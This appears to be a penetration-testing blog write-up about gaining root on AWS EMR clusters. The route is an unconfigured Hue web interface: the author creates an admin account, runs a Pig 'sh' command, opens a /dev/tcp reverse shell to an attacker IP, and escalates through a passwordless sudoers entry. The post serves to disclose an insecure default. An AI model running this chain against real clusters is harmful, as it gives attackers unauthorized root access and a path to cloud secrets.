During a recent engagement we found some interesting default installations. It appears that some AWS Elastic Map Reduce (EMR) Amazon Machine Images (AMIs) have a default installation of the Hadoop User Experience (HUE) that listens on port 8888. During the initial recon we were able to enumerate quite a few of these servers that had 8888 open and saw that by default, Hue loads a page that is expecting a user to create an administrator account for the Hadoop server (and sometimes cluster) that it is running on. So we logged in and created admin accounts on all of the Hue servers that were in the target scope.
One of the cool things about Hue is that it allows for the administration and creation of Hadoop map reduce jobs. without ever having to mess with a pesky command line. Hue also has a GUI interface to Apache Pig. This option is accessed in Hue by clicking on Query Editors and selecting Pig.
This GUI interface will run commands using the grunt command line. It also allows for the running of system commands if the command is prefaced with: sh. Running : sh whoami showed that the system was running as the hadoop user. So we decided to see if we can pop a shell. One of my favorite ways to get a reverse shell is using the old /dev/tcp trick. By running one simple command in the Pig GUI it is possible to call a reverse shell to a server you control. On the server you control you will need set up your netcat listener by running:
nc -l 5555
On the Hue server enter the following command in the Pig Editor:
sh bash -i >& /dev/tcp/$YOUR_IP/5555 0>&1
After the Hue server sends the job out to one of it's cluster workers you should see a remote shell connect back to the server you control. This is a non-interactive shell so we need a way to upgrade it so we can see what our sudo privs are. Most modern Linux operating systems have Python installed by default. Therefore, we can take advantage of some Python magic by running:
python -c 'import pty; pty.spawn("/bin/sh")'
This will import a pty and spawn a sh shell for us. Now we can try and sudo:
sudo -s
The AWS Hue install makes this part nice and easy for us by including the Hadoop user in /etc/sudoers as:
hadoop ALL = NOPASSWD: ALL
So now we have a full root shell on this box. Keep in mind that this will usually not be root on the Hue server you ran the initial command on, but rather one of the hadoop cluster workers that is connected to the Hue box. So repeating the above steps a few time can actually get you more root shells on different boxes in the hadoop cluster.
We did notice that a few of the Hue installs did not have worker systems configured and this caused the reverse shell to hang and not work. In addition, this attack is also dependent on poor security group configurations so YMMV.
Next up looting secrets from AWS hosts using the AWS Metadata Service...